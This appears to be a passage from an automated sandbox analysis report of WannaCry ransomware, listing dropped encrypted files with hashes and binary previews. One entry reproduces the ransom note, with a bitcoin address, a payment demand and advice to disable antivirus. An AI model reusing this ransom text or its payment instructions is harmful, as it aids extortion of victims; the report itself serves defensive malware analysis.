SHA-512:	0C98C24FEEAA602A3FEADB9E4735918649819C8A022A33392FBBC5C234716AFAF08167F95DDD19634293460FE0C3A800E84666315F6C03A346E99BBF5419222C
Malicious:	false
Reputation:	unknown
Preview:	....fG....g....FZ..kH.[!...X.K.U."a.m..XBN..D.WjX..c..a.glJ.4.._}CI...F...Y.$.%^q:...{......j..:..6......AF..7@...y...,........\|Z./6e.c.O.Qg....I.....Z.x..8a.rn.3...^do..k=..,..o.E.}.Q.......[..b.4.&..~A.cse.X.....GAR.L.6.0E.y...c0..:.K......J..N.!n3...a...!.1.;../...S....+...G..#7.....Y......_.L.d..c..b..t.LA........'n a..DL..I....G..qJ:...".,8.D^$>.&.QBWi.......16..j..(.y^...S..G.'.).3.k.A._. ..D...ts..`..<....=...w..8.p ?.......yH.KKGc.%.........p....M..`u2!....V.5\|..:4d"..7..LSqr...t..\eeMO..h0.+w.p......j...V...\|.$.M....{.".g...=..N>S.[.]/A3.C.!?....ZT]Vp.$..Bf\...m..#.?.i`.....@............A .....%.....d.......-.O%K....U..~w..'.b..}<.i\x.U..w..M.=..!1p.Q.W}s.....#..s.T.p....W.Z=.l...P..b.P..c.3..>$.....[...^.......{..E^.<C.8....~........./.-t.uc.......).y%.Ni.2.+\.Y..1.%.s...%.........3.f.qbS.h..._u.....bl.9o...R6.......>.P......:...W>&.0.......jD..K#..5IF.1z.p.Tn8....-.1.GM.C..,$G..?...1.7......s.*..:...X.3{.lP..k\H...nwI..... .

C:\Users\user\AppData\Local\Temp\46.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.8151014205025575
Encrypted:	false
SSDEEP:	24:sS57/9QhkXvSX0QVzf+vdFTWt7ai6baOfFHBCpJFKDPNV8Pk:sU7/TXvqlVzf+1FiaiIf9BCpSQs
MD5:	3BCBFF0E842208F43229A6FC0AC0EDCD
SHA1:	09C8E1D4AEC4751DDB0AAF1FCA633FEA6ABBB3AC
SHA-256:	EF2496E7A5EF843515B92DAFF3871F54898401A0BDAEED65A6DA11BA5B0CB26A
SHA-512:	B4E343A0F2292B9C58EB7D90FD3F119F07E1624306F0D3F3C3218705E61588E42382CA50BBE198AA133A4432FD27AB8FCF0EA0CE99DC31A90D583480011117D1
Malicious:	false
Reputation:	unknown
Preview:	M.g..!W..T\..%l.h........}.}R...a.....U...~(_.d.^3...........j$.(.N...S..&.....U#.!...l..._..]..@#h.,....r?.5.#..1.Ow..........).\....>t.1C.%....[.....=p: uL&mI..K.....YDX2oi..yX.D.aB.uj..s..'.....(LIL.&.D...!R.u...z^.@x.@{.`..].f.t.......e=...E.0..z.0.7....-...Bb\LV..I.........9)T..o.}#.s.E....T.t.....B.a.M...,.$5;].`...`...8...e;,...7...D..\|./........T...8.....E5..B..+....2.u....Cb].d.>.-..x?1O.H...!.}J....Z.q}.[..KJ1F%R..G....-.!..3.R.:$FL.....XYu...'.Lc._..a..L...bA...'G...{.&...Gw.>E.t.....!.U.4....\.....5.....o...............e&.x...h1..W...t>..C\|.+W..T.(..&....,.#Ub..e......?...n.....?X.5;.....QS.s...l~!.:.f.j6...{H.C..D..c.d....o........f.....5....\|#..\|>.c%-V.J...Wx....#.ls.....Y..o..F....2...0.vzry..j..C(>-S..f..#......S3L].M9.&..0....2k.J.V..H-...o.fP..g.d..OK...HWn.Q.2............V.Mf.m.o.8...3.....Db..`7.G.O8..J..`O..^IyhF.M...h.U.....Q".q8...2l.q.,..\|...ONJ...;..{...Sr}....n.:D.cu.ld.W.1....q...^.]..,.\0.3d,.c!..E.

C:\Users\user\AppData\Local\Temp\47.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.7908864080441225
Encrypted:	false
SSDEEP:	24:Ujq7h9+P0ZiHKPO6veG3P5uePWfCKHmSgHh9ej+uxDGN:U2b+PWO62knPCNmSgHhRuxDGN
MD5:	0D78C655048F0656F6C1B4FCF62C174F
SHA1:	134D69492CCD1754F79B06815500E4DACA7CA63E
SHA-256:	2082C2E5A64F9582EF6028D6D12598F3C02A34EF164443F14D48B229466B3CDF
SHA-512:	66DDB811F8B97AFB22AC0E08694E2B03EC95B91F2920FD4523080E6E570878A2F1C03E2C736169B93F29674BB521AA3AE0EA9FDFBFDE44032206D03EBEE27B49
Malicious:	false
Reputation:	unknown
Preview:	q(.?R.A\|6."..0..OC..^.......Z.%.......... .....jX....`f.+.<!....>6.........%.Z.j.S.0.#.)c...u...E~C!v...,...!.lDSHhZ.o..xp....S..[..]l..........n.d......T....!.d.6m..?.....e..V.....%...j.A.b..y..k.H.=.....%.`...~..g uL.....T.8..d..j.$-..B..V..E..=..1.>.z.c.^.....v...B.3..M...#..;..n........_.~...)...Cw.PH.r."..e.C...!$p..8.....2u\|...g..?S...l..6Q..o6.4AV~.X..{.M.`.p= ..]..;....\...ky&...<.B..c.\..:....<.....@.#.].Q...l..I.....j...5...~..~..!...\.!!..;....~5..o.b..$.h..Ih.........[<[.;p.....W~.jX....%..{.7.l...k..........qs..3.;.n..6.~....`Z\v.!.-......\|#a{.....^.[<`?.j[..~2......4...RHNF.dG...iB......FBR.P....c....0%....'...k...J[.;C......^.=..b^.;....,.%....p.......(,../.'/.#".....y....EfR(.G..U%oB..W...-..')..&.....Gd.Y.b.....I..C....+..f....#.5..'.~.F.(...M. .;W..\|.T....x...s^..2....C@.h.vWm.....]k&.2.L.L.........lx.J....<......../....`1&.x\|....L...v.....(.C.....J.4.[..8.......[#V.yB{6......15\|K..w.1....tJ.-. .f...!..E....jI..

C:\Users\user\AppData\Local\Temp\48.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.789359512777786
Encrypted:	false
SSDEEP:	24:mWfn2dZYRXrdh5jrPBOuHUJ1VYKgcsFuEXCnLLuNHF2Y9t0j+V:rnEYRXrdh5Hp3U/+KjsFPXCHIpt02
MD5:	30CBB8932F6ABFC5946DDF6BBED34065
SHA1:	BB591652C80CE61AFF69BE33B00013D8FCEC45A2
SHA-256:	3CDD80893E506895A1C00345DDE039B63D7CF0A9089575E46D02F3C30A4AE8AA
SHA-512:	18FC476BBB8E823581C295703A4957489A46284E21B3100335EE7C3553A4690B21F00FE0B78E9D7D661FD1CE7C4D2800C815619BA0566CF5592808EA6FC1453E
Malicious:	false
Reputation:	unknown
Preview:	./.-.5.<M.Y.....l...a.@...Bd.<........r-0W.g].w:..C.B..'_F ..Y...e{&..d.."Q..I.d.....E...........6...Lp..Qj...oae@.(ek%(N...HI ....M.?......i.?...M..&....S#.)....z....._....V............^...`.wif)."...p.&....)@d...J....\|..q[....P.tG?...I.~.5.lN....f.}.C&.j..S.uP.....6..?27I...H..vIG$.....A.X8....s..t....+r...Y6c..I..'u..l.a.{.j6yJ\S..;...k..]`Y.]g..P.cI\.er]u...........I8Q..`.....5.He2hYN...Z$..A...yG.DG......5ZPf.F....-..9.fT7P.Z.w..h.:...7}.$\|.J...v(....<S....ru..u...x^.1@WA+.t..6.... g..f.Ts1X_..j........}..c..^...&4.'0]...a..{..!.kSz,.w..FcuS.&u...R..z.K..Gf..su_z.ws..F...F.....5_.+.....\%P..J..o.......C...F%....j..{B..s...xD...B\|..R.L...z[0.3..r.M:.d....R.s.....'...G?...j<.................e\`t{c.Aj5.r.....v.'pDk.'zf..../tV...X..~0o.~..y.x.E.5.s..LK~(Z....@O... .h+....v.c./0." F..uFN.vw).Lo..(...R?o'..d^.....j.;Vvm.n.H..WR..'.0..X..TU...z,.~..>3.,....K...@...n.n...S......v.E.W.#.....c..\|0..7(.....O.D...K...y....an&2P.]..!...`>.d3.\|.....Jk.

C:\Users\user\AppData\Local\Temp\5.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.828121638741726
Encrypted:	false
SSDEEP:	24:ku4GEg2Up1vNc39xMaCOjiAqVXcAwKvHO4rGyeA/zw4+Q:ku4ZgTgMZciAA5wKGEGyNw4t
MD5:	5A87B1EC5868EB417108121F18E582C2
SHA1:	71AFCF6DB75C4537F7A2EABC77AE95516C12175E
SHA-256:	1FC888FFA3E13C89DB7662864F0A90C17A9D450D508E6D748EFD7133FBC92842
SHA-512:	45F31377B17306AAC9EF33706E9A160E07EC99C903297133EE802CBB0BA4275E2087262C227D236330D539936A60908B7BF35D13FB03DCFD3E7902B8709F40C0
Malicious:	false
Reputation:	unknown
Preview:	..[.q..c.H$...t.bA1...^...8'..8.\|.^.Qz.E.li....j........Suu..y.{R.d..n.. ..F...4..!....u.....Z:.i...HRW.D..9t`.B.......Ag........dc:W@..?..b.....4............I.&.....^..].P/.....Z>.h.......\.].02".O.%`.Bg....^..N..G>..RBl....;k.&g\|B.!....p.]p!.TX...b.vhn>.....dq[...C....f1R.0..a.....r....A......~0.....:D..Z..E05.$.[]..=..}..._S.Q....Fu..G.c.8.R..+....D.7.Y.J.y..N..i.(........u<i...'......3F'.0.zr.J....2...v>J...rY.L#..@N..Z.... :.....>m.-....Vv.3JEbJ..5.Xq...-..!`x....Y.WX9.MM&Fv.+."C..v.b....b...oE...Vd..i.......:8B......)...s..x,.#.......v0m.):...D..L.j...{...m...U......f.sP.9..F......S..].D.#....{W.@TL..sY....X.....>..n........D...D......~.]#.u.......G+}.CBE..S8j.%(6T.m@5.:..R..k....^9).A.1.....[.s..a."B....Q.0{.G......V....'.....+..<....6v.[..S.c.......n..0........x....-..4...).G.....E.GgA...s.2Ou.jy~...e.i..........]..g..G.bl....Z. ....P;.DNf.G.95R......d]..\...d..........!.i.tU[B.Z&...p8h..uV&F..SE..........:.r.-...3...

C:\Users\user\AppData\Local\Temp\6.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.826677545698554
Encrypted:	false
SSDEEP:	24:UPtj3sSYK4NcEiGQ8LxBLa0xF2PJ5USQ0XY5H06FEt6pN:qV3NEvQ8lBLaiI/USfsH06UQ
MD5:	A649C1D022788AA9612ED6A5527B3EBA
SHA1:	D3771ED34FB56FB13C9F7CC10B1B1E07651D2411
SHA-256:	20194FDCAB74A145364B88C26994375D0B18287730EC2CB9FA61F838CE04EA8B
SHA-512:	BCE3A6CE340715D6128C0FF786A2AE037293D9A2BCACD67648F55D59B65747E51435B8F964971AE7FA3AF221405C3C1B0960D384B5C62A40634E9A4EF7360DD8
Malicious:	false
Reputation:	unknown
Preview:	..v.m.u..Kd.o....P..r/4....&...Y.\?h......?.2..g.......?t.>D......r\.....[2cX$A.......d2M".:x......O..IN.Q.....xt.H.....)/lv.....I.W#.e....F..n.....9^x........t4.{...R..(.0qt...f..O.'.>..-tDb..-.\|.$g..0.6..uW...PYm..."..m.B.V...v.wN..-E.@"...jh-."h..Wkrs.....)..NC.\|....]B......v..\|................ ......v.P.....C.....*.-.Q]G^...oxw._..Rj..('.>....&..x.......r....<.5..Zq.N.tI......X.-...7..{..F.#..1......Y..#(}.j....L....3....j4.X..:......@.....y.R...I.1...e........i.`_.1Wc...HZ.?..<.)s,y8..!....~.%.Y..mV..8.$.!5...!...g..Y$F;.pY.^0b.yt.$....A..C......w.h...\|...=.Z!...k..`.8P...3;.....{.....RBF\|}~...3..1?...I....`..;8<v.\.[.0c...%a.y.......2...G.k~.......Vu..._r.~.c............0+.E^.p#....l...>%..-..w.......V........6@....2'.=....Z.....b2dG8=$v&.$..u_.2..#......m...F...\|DI..Qj.~.D ...h.A...-.\...f.'Z..".^J.P.j.(^......$B....`...hkT.TG.X...ec.v..^w..#.!.5......iKrQ.c...\;..f.......y..>.^\|....q..S.n.R.._..rF..&Jnh..F...

C:\Users\user\AppData\Local\Temp\7.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.78663728028069
Encrypted:	false
SSDEEP:	24:58DLsb1xRSfSSNFF2fpj5HwBC860jAogoBCrP5IRYfM:56S1xRSRFF2fFNwBte8Y0
MD5:	00F603A59BDC9149E8A01687128FFEAD
SHA1:	D9D319CA1B33CE443903D42C06E1CCAC62B75E13
SHA-256:	7BCFA4F45990018AE0223AB724ADFE8238B1D5E9870654BD73A24C5AB6E642FB
SHA-512:	C1B3DFC01FEBF0656031967A025B9E9D7EA6DA507687A4603839200F248E1A8412828D9C49EB342D5DDD40489B48EE0DC035CBE1C449901A8B2FEA5D2C78D13F
Malicious:	false
Reputation:	unknown
Preview:	p..u..]..d...BY..[. ..+z.F.n.D....,......7....-].O..z..}T.!...z.m.....6...^./.54.wP.N./....\..9.0..o........BC....B.Gt....Q...uu..y.......9.FY'p...>w.]..+C.....5..fyR..Bm.\.D...p...+...p..\.i.w:^IJ.d".P.b..Wc).Dy...%..ny......D_e.p..q6h9....\|.OY..yz.F.'.. .;.AG?....C......2.;.........'.V..ghN.sm.K.c.....R. 0..2..>..ya...../.Dq..5)mw..0...;GD.he.2.=.%....j.`cq.W.xh.{..a..3...'...m...v.[o.{....@0.....3..........._...\b.....M1m5....(U.....P.TP...&?....E...W\...X.K.L...xw:...I.=..S..._m.;!~....?.X...$...Ay..#<....qx..2d.T.?=Z>d{....,t...{.,..;.pSY.^.q...rG.d~.......i.../...5.R..8...?.3.....N...HBy.hA&........):...8...Z.P.S.....Q.Jb..3"+.J.9=A..9G.j.F...z....t...!r...b...s..<..'.i.Y.%H=...K.....se...C......i.,...$.X.!......Mh...P0....bP.S../[%..~....P.&...<p..Ji.V5@L....D@..].q....!...'...Fz.O.Q....4~.@..xW.f...v\..y.O....o.^V?..N"'G0.}>.\..u..x...,jm..I.....}.U..}..>.8kL..........Q...M.[.t..5.....f.z#g..sz.....c\.2...p.7i..'.k+.c..vy..}..2yv<\.u

C:\Users\user\AppData\Local\Temp\8.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.80931937500755
Encrypted:	false
SSDEEP:	24:BixfUHx8kQMkodh3/niXgbBrQH7EMcEhlBJgnAzH22KR:pR8kVk+1alHgkD8nUWj
MD5:	5168DA0C18F830519AC02C7FEE34AAB7
SHA1:	5CEBBF780E10714198E06069F69ECA8264E1CB77
SHA-256:	907C59EF3A69F4EFA10C921CA3EBC495659D7896E008942E8C39807D5EE90DF1
SHA-512:	0D4D1405495102C7DB781270CAA7FDEA5C08B1FFF553E260A9EA5795B7DBAA20C6078F5A67F1C7B9115834611D3A9A2A213967426E92B7AB8544FEB5FE4D1CDD
Malicious:	false
Reputation:	unknown
Preview:	......j.._Y.?I...S... ..F....A/..`.7`...z%..H...ct......L)B.v.!.8w..J....(.i...%...,C..>k.dd.... ..K.;Z...D!.^f..)..lr..[i+w.h6.l.."..._..G..m....j{J....S.M`....f.+@{..+.-..3....._f..$0..n..~u...L...A`.S..b.@...Wm...8v..!P..B..Y7..'........,.Q..0,S....%.O. .K~.X..A..-.C.#..!....o.'&....GJB...)....:.eCpg[m.mo.$......C.!]?.....X..o+\+..k..a.Ce.T..Tq..&7....Of>ZD.......qM...g.b\|J..8........T....m+h.o...J.t..G.C._).";Qp3S.!7....<....x..-...-..+.{.L.jM..E.....66X\.Q./.....y ..M.u.....9G.4..R...c.....b...u6.Z...;gW..,Hz...+FN..p....<F...G..'........W.L..by.M.#.WI .OV....F..?~.-....xe+........A...x.......?s]..sR....f.#....8>....M../.XE.=...~.qz...F6[.#H..=?\|.!X..ov........#cW..1.d#!..tm.^\|!"Rx...F..X....1....%4$J.M...&Ix..>.X@..E...T..9xs.w.../..1...<.V.M.nR(n%7u,....2i...zA...@....$w.......N....#.......E.<..{Z..... .Z.7..i.....Zp...>f.X.JsR...Y..D.c~j......Km........../...wR..J...0wi.n...d...=..n.......GV.*......n..4...}.;.;R.....

C:\Users\user\AppData\Local\Temp\9.WNCRYT (copy)

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	7.832798952348822
Encrypted:	false
SSDEEP:	24:J0TqdlRVA1QzwtakthMGIpi+AZEvNg6o7/GWdwf:rdAaUtMGIjWEV58jdwf
MD5:	1BDDD68970CED4DD2E2187E014877171
SHA1:	6DF54077283EB5C1977197130F68BFA6D82D2A00
SHA-256:	5710F097BA631DFD54F1FDC18296EADCCC337F234EB5EE899AB72D35238FC21D
SHA-512:	1F4078AF5430764FF11725285F88C84EC956DD17CFF38193D59F393D6A3758ED8E61FFAC5BF8E543C9D3FEFBA80FADF0142730D57A185AC4FE0AB3A7CC0BCFC7
Malicious:	false
Reputation:	unknown
Preview:	G{....)].RXJn0..\|\|vT..+s5...rK...K...@....`.Q^...C...#..;.:FT..px.'..2..Y.p.].A..m....@2SG.c.....n...I.\|k..{: ....E.lm.........~...q..v.~+.Ua.<..sHD....2.[5g..d.....8sA..i6....I..o.......L..[...~.?s.RL.m.N....p(...s/#R..B..y.u..^...D[....J6.A..C....'.e..;....W..r..4..CR.)YaA...y)..D..X...A>.....}...k.e.R.TR...xz.]8.gGT...=.._.u.f3.!zd.......`.\4wC......Mfh.V...-.. .d4$.-P(.'.'.V.J...X.&.....T.V.(..~..i...u.....F........,....-^.2h.p.......R.[N_....;.....M1O...p.w..&..Y6..;....5G]H.t.B\|Aw..)\?....i.$x..&.....1x!D7.._..&.dT&8..>}.............<..[...0..[.e...0...t.ic...i......Z.d...w.6..A.e.".:...x..H...6. H.?..z!z.."..#..[....+.[I.2J...M.. .8x.L..{..b.\..J..JU....\\....0Gs....M`c.. N..B..m..z4..Nbg+%...6..-5&`......i..!jl..p/...L...9f..u_C....~C.....z"...@L]$...=.w..9LD,8...,...7...AnU&.........\|$".,w.D.h.]....i.I8...i.._.oA..]~....x.S...2...bX.....\..K.}..}......i/.-.b......]....\|.x.J.....v..M...u.>.....atG4.....(.b..h.1....v.`.g....

C:\Users\user\AppData\Roaming\Microsoft\Templates\@Please_Read_Me@.txt

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	933
Entropy (8bit):	4.711824502619554
Encrypted:	false
SSDEEP:	24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
MD5:	7A2726BB6E6A79FB1D092B7F2B688AF0
SHA1:	B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
SHA-256:	840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
SHA-512:	4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
Malicious:	false
Reputation:	unknown
Preview:	Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....

C:\Users\user\AppData\Roaming\Microsoft\Templates\@WanaDecryptor@.exe.lnk

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 16 12:48:43 2023, mtime=Wed Aug 16 12:48:43 2023, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
Category:	dropped
Size (bytes):	577
Entropy (8bit):	5.130736260231282
Encrypted:	false
SSDEEP:	12:8RWXpzYNbfubUV9nCOTUoBjA9RoTwmQbmCt:8R/4bEcOA9CDQbm
MD5:	EFF1EF4995F8BF6C61B07BA09D6F5B70
SHA1:	3962AE93845DEFBC439B6C727218F3587C07AD5B
SHA-256:	FE6E4230472001768D368ECE27D067A6C7A060DCD37C29F6E763556A83523A02
SHA-512:	900144EE048935C7F38CE7A503C6CB8E4246C97A3F8D254D22725AB03D6CA151D9416AB70D4B094BFA86AEF5C9DFD051EAF559E65FBF4E383FB48088889560E8
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ....&.^H....&.^H....X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.......`._....'_H....'_H.....t.2......J.. .@WANAD~1.EXE..X.......W.n.W.n....up........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......Z...............-.......Y............Y~.....C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......675052..............n4UB.. .\|..oI..k;<.....P..#.....n4UB.. .\|..oI..k;<.....P..#.E.......9...1SPS..mD..pH.H@..=x.....h....H......c-dSA....n.............

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	52120
Entropy (8bit):	7.996265248193652
Encrypted:	true
SSDEEP:	1536:oT2pSVJarFAyinqaSk9SgM2rp3/+poJlv8vW0diMJ:Z0JarqpvU2p2pulvKW0gy
MD5:	E0BC9A76759BAC8A594DE936924B3BD6
SHA1:	02965FBD104F97B4CCD49993E58CD54B2081D8E5
SHA-256:	4E82789B0DE945A82F6E6461A3080811A621E72F9388F42D880384F0CF91DF58
SHA-512:	DF035C784D686170D27C2CDDCD5879460D846DC291446EF493B46F67B20A604B1F187B3125FF1D09155D00E2A22EDF28CAC67540A1495629821AA8DAA570BB5C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......[.....7 W.M.Me.(.mO.."..KQ.0$..J08h..i^_..4........<?V-K}...[..k.e\B.W.M...X...R...?fBFqF.....E.;...3........\|........Yi..T._D..)1..^..!..M.]./..).a.&..V1.OSH..sW.b..bYf...W...'x....g.9.x8.....\..N......m..)nN..4....B3b.b.....u......b.iUoh..a....r........<B....g...3..#:..m.q.....=.....qG.....C{.......!E........$z.}.]..."R....E..ZP..uI.0....-.?..Yj..,.p.H[..0......7^.B......],....r..... .'..`.@...+C&i.d.......4i.....\....{......b7.....n.......+......l..d...oX...lJ..............(.:Z........~L.r...Q.K.nNz.......>....#qx..=(.RZH..-.....O.en.f....../!.=#+.-C3I......i..F......s.U.T.%..Tn...l...X)N.]....'..Z.4.#sBH.^.....?k..:[.X..t..........'\|....Wk.+. ......h...u...mD..o.......xr.A{.a..t)...........I.u...C]"B.u+N....>./2..1...F7...6a....?....WM.!.x.A..a..L.?.lQ.y.c.db]..<.v<.z.G'.W...."~...[...c.}..*....RnN..R.X.d.....k.oIlA".n.k<...........Y.]S.Z..Vzs.2....z.......6.%w...[..r..9.d.sE..`Q......93..;..z6c<QzK!.%.p...;.....).( ].B.U..0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	47576
Entropy (8bit):	7.996108040172503
Encrypted:	true
SSDEEP:	768:x06LIeeovXMdv0ragKstUJv1xv1JeO3DAFoYeEe3RiVMLfGQMMVz8C:j1XMdv0eCtUJv1xr3DHYBeIV8fzMyT
MD5:	E3414B5B32AFB14B0018D3604204FAE1
SHA1:	F6ECCF0976AAC45017B092E3F1F73BD7B83F0C0B
SHA-256:	FE7C22CE0793AFD0EA963C0034474421B5CC6E7CB5B21A3DB7051F261272599E
SHA-512:	24FEDA02C69DCBCE70D480CCACC14E890A1D026164A899004C9AE60AE93D4180A1D3D59C86C3EDCF994D4D286FFD216571338864F637662AB4D568DE83D407BA
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......z'..8..m:.....<t.A...z.Z'.....wp .M..._Cxv..p...E..WB......QU.}.:nU..F:D..f.sA.?m...{.k....QL...$s&..i.......=.}..bIp.[.,..t........F..\.-^.0wMHASbjl.".."....,.(..,D.....<..Z...c.....g.PjA..@5...5.........?.3.Pg.'B(.#.^..%.....b9H%..8...Q.~.E.(.............k..L........k3...~.?..\|&V....p....KW...(J..M...MYTA...j@....5....g..1..w..S~3Av.v..A.;m...`..<..}.v$.5......0w....B.v...^Xo:.....b!.7a>]..Uh^b.`...>/.v.J......[....<k.-VF.......P.z...<...k...?.pV.T....tW.M.6Vb....x...jD..L..^...V;...G..^N.l3.5..[.........5..I..........y......l.%V..we..L...O.~../..+.XP...}2.7.....s'V.{@ ..mc.....E.j....(..l.U.Q..vt=Q.$....@..G.C`L-...<...[i. ..t....;....x..^...O.cv...<.Vo.#>..(\.B.........m,n<%.=.'..L.....l.7u.....Wr...}.....L&g.....d...i..A.^f_gB X..?N.qT.y~_.D".cY............T..a...d}H4.....X....%.X.@.3....\|K=...ao"..g..#.m...#J.....1.r.D!......v.Q1E.5....5i...f......!{...<.....c.."L......1..$.7....O-`....a.=..B..G.....-.Ff..~B....X..\.*.6v+

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	34696
Entropy (8bit):	7.994388039238772
Encrypted:	true
SSDEEP:	768:5cZAvEDBgIY5FtHss58UTNHbpg8e56Ea1ZjKSd:SZAvEte5ntxe56lUSd
MD5:	E702B9F266C87B56621D0546395C325B
SHA1:	977C2613A198EF3D37ACBB27BF3B59ED9F402312
SHA-256:	1AD0BA1E9961D58A99161C0D56BB528516DEEC93FE1D293EE5A81EA977F0102B
SHA-512:	86BB5C04606652E901CB7EBD955D10A43ED6EA04C1A61A393257CE93DA7F1C2A342130C9CE537657A592A231D59370C1F6199C0BBBB922EA43E54C7671864183
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....e.P!...Q}.....j..I.V_... .D..'.D_.e..+km.Zj.....9o]O..a(.n~.#......uI..+....";k:..-e.....k.t.....T...K.9..m7..-El6.....K?a..z...+T..s...2.U.h1.R.....QZi.X../.h.u...r.e.f>.\|I....#........O...J....5..O....j.s..&..f.....,...1...,.n...V..O..Ge_....o........d%......U..ur.Fh..U..]...U....e.U..N..b...)..~..yy.4.?F`B...~..3.V....=.T....j...8....t....-...nG.1.(.q..L+K...a..~L%.[XU..3...........:.pQ!...E.U..W{0..O..cU.\|.......w........&Z5n....T..(iM.>..!R............#N,.....U6...1l...:..\..b....+8...&.l78..0..t.[.v...:rb.@....i..3C..lU`..X.~PZY....&l4'........>...S.qU...S#.4..1agpBS..._..$u..,..x3a....`w...l..H.!E...o.MO<t;...+B.%.....2d......j..<.I.gS....o..w.........X.....>Fj..].iLDmC..nwI....t.....?,\.>0.d...`....b`.f-o.g.$.e].J....x+.t....h.......{.........r2....h^.Y.m.r.XQ.U...Wh#.YA.e...>8,z.'?&<(..fSAu...!.....nZ...\|0{........^...<..L..\...g.N.'.V...<ys7...q.Fk......T........%"......G....v.5/.7....>^..2....&..q.>qk..P..O.K?..W.(.

C:\Users\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	3465368
Entropy (8bit):	7.999949790896019
Encrypted:	true
SSDEEP:	49152:6nVU2dzJnncV2wy96iyvbzMkrqYExLNIc/ulzYMjP/5eYYqvs0V6hOiu0P+PdPy:6m2dzJay960w6xLN8YMjP/IYTs2iPU6
MD5:	3A9DC2915925CFCE71A1DD48C65C8D64
SHA1:	235C4AF15A5618351002D4E8B5EEC82669355D6C
SHA-256:	B202DF390F79FC746DCB5A3BD9E8F72CD41F8FDB34818F5B4D3B995D1A20629D
SHA-512:	FE7324FBD340C2EB9762929EDF104FEE1336E8FBAA8B5508AC325D037F417A1A94F4C8D07B115ECB0C71A32E86F36442E12614F6A78AD3218EC8BF5995813B18
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....'eR<UQXNVL...6...B+..0...o.h..2`~3rn.h[4e.....hc..B.d.rA....6.....:?<....g.<A%..$7.......XCH$..........+.f.....W.u.....`.~.%..b......}..Ypg..G..;b$..&x.....?......f.~\DK...{,...p.&.S....\.2u...0._.Ke..K.{.K...#.C.J{....^...s).....$.e..#f.....t.4......1.k6...a&...O'.6..]y..;oR..........C.-.9..dtp..t...&x.p)../...8r.$....D.....D.xH......,..=..ZX`;R../.7.....Y....spLQ.{..:@...y....u....j.~v.....X.....z<Ly..r.U...........}..t)..p....W0{G..1..b.=.Kp.v.4.`.'...s.zM.j.uf....Z...g..G1.b.....L_.....jc..._f.rI....$..1=.(..o_M..S........i3..U....?B+.v.*.........z...\../...m`)...Uo...b..ps........{e..VM.=..@E.....U.=.....d..I..q..._/...."..;.1'.f.e...'!...,.....D.eNE.yq........b.=8..!........AxK.......b4{..F.a..5.sK...sU....G_.t....5HK(V.Xz:......_.X.`...._.......!. 